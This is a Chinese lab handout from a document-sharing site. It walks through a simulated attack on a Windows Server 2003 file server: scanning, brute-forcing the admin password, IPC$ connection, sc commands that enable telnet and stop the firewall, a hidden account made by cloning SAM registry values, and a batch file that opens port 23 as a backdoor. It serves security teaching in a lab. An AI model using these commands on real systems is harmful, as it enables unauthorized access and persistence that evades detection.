实验五-模拟黑客攻击

合集下载
  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

实验五 模拟黑客攻击

实验环境:

本例以攻击一台文件服务器为例,演示通常的攻击方法和思路。该文件服务器默认安装了windows server 2003,启动了windows防火墙但是允许文件共享。其余设置全为默认安装设置,并安装了所有补丁。

A

B

VMNet2

文件服务器IP 1.1.1.1/8

客户机IP 1.1.1.2/8

需求描述:

➢扫描目标计算机

➢获得管理员权限

➢安装后门

➢清除攻击记录

实验步骤:

一、扫描目标计算机

a)在B计算机上使用扫描软件扫描目标计算机A,确定开放的端口,判断操作系统

的类型。

b)扫描软件推荐使用X-scan或流光。

X-SCAN:

使用流光:

打开流光主界面---右击IPC主机---编辑---添加目标主机

主机添加完后,生成字典---工具---字典工具---黑客字典III 生成字典

右击目标添加的主机---探测---探测所有IPC$远程登录

配置字典

探测报告

二、获得管理员权限

a)根据扫描结果,尝试暴力破解管理员账户的密码。

b)X-scan、流光、LC5等软件都提供了暴力破解功能。破解成功后会自动生

成报告。

三、入侵目标计算机

a)使用管理员的账户建立IPC链接,命令为"net use \\1.1.1.1\ipc$ 123456

/user:administrator"。

b)使用SC命令获取目标计算机的所有服务列表,并保存在本地,命令为“sc \\1.1.1.1

query type= service state= all > c:\1.txt”

c)打开1.txt文件,找到telnet,确认telnet服务的状态。

d)去除telnet服务的禁用状态,设置为自动运行,命令为“sc \\1.1.1.1 config tlntsvr

start= auto”。然后启用telnet服务,命令为“sc \\1.1.1.1 start tlntsvr”。

e)停用目标计算机的windows防火,命令为“sc \\1.1.1.1 stop sharedaccess”

f)确认目标计算机启用了远程注册表服务,命令为“sc \\1.1.1.1 qc remoteregistry”,

如果服务为停止状态,则将其启动。

四、添加隐藏账户

a)建立telnet连接,管理目标计算机,命令为“telnet 1.1.1.1”,连接成功后输入管理

员的账户名和密码

b)通过telnet,在目标计算机上建立隐藏账户,命令为“net user yt$ 111 /add”,其中

“$”符号用于在命令行里隐藏账户,但是在图形化管理工具里该账户还是可见的。

c)在本地运行“regedt32”,在“注册表编辑器”中选择“文件”——“连接网络注

册表”。

d)打开目标计算机的注册表,右击“hkey_local_machine”项下“sam”子项下的“sam”

子项,选择权限

e)在SAM的权限窗口中,赋予管理员完全控制权限。断开与目标计算机注册表的连

接,然后重新建立连接。

f)展开目标计算机的“hkey_local_machine\sam\sam\domains\account\users\names”项,

找到“administrator”和新建的账户yt$,记录他们的类型,本例中“administrator”

的类型为“0x1f4”,“yt$”的类型为“0x3eb”

g)展开目标计算机“hkey_local_machine\sam\sam\domains\account\users\names”项下

后三位是“1f4”的子项,该项和administrator项对应。

h)双击右侧窗格1f4项下的F键值,复制F键值下的全部数据。

i)展开目标计算机“hkey_local_machine\sam\sam\domains\account\users\names”项下

后三位是“3eb”的子项,使用从1f4项复制的数据覆盖“”项下F键值的数据。

j)导出目标计算机注册表的yt$项和000003eb项保存到本地,分别命名为yt.reg和*reg,然后将yt.reg和3eb.reg拷贝到\\1.1.1.1\c$下

k)返回到telnet命令行,删除目标计算机的账户yt$,命令为“net user yt$ /delete”。

l)在目标计算机上导入yt.reg和*.reg,命令为“reg import yt.reg”和“reg import 3eb.reg”,完成本步骤后将真正在目标计算机上建立一个隐藏账户,使用命令或图形工具都不能看到该账户、但是在注册表中可以看到。

m)删除目前和目标计算机的IPC连接,命令为“net use \\1.1.1.1 /delete”,使用新建的隐藏账户建立IPC链接,测试该账户是否建立正确并且足够的权限

n)打开目标计算机的注册表,右击“hkey_local_machine”项下“sam”子项下的“sam”

子项,选择权限。去除管理员组的读取和完全控制权限,恢复到默认状态。

五、保留管理后门、隐藏攻击痕迹

a)在本地建立一个名为open23.bat的脚本文件,文件内容如下:

Sc start sharedaccess

Netsh firewall add portopening all 23 enable

:end

b)将open23.bat文件拷贝到\\1.1.1.1\c$下。

相关文档
最新文档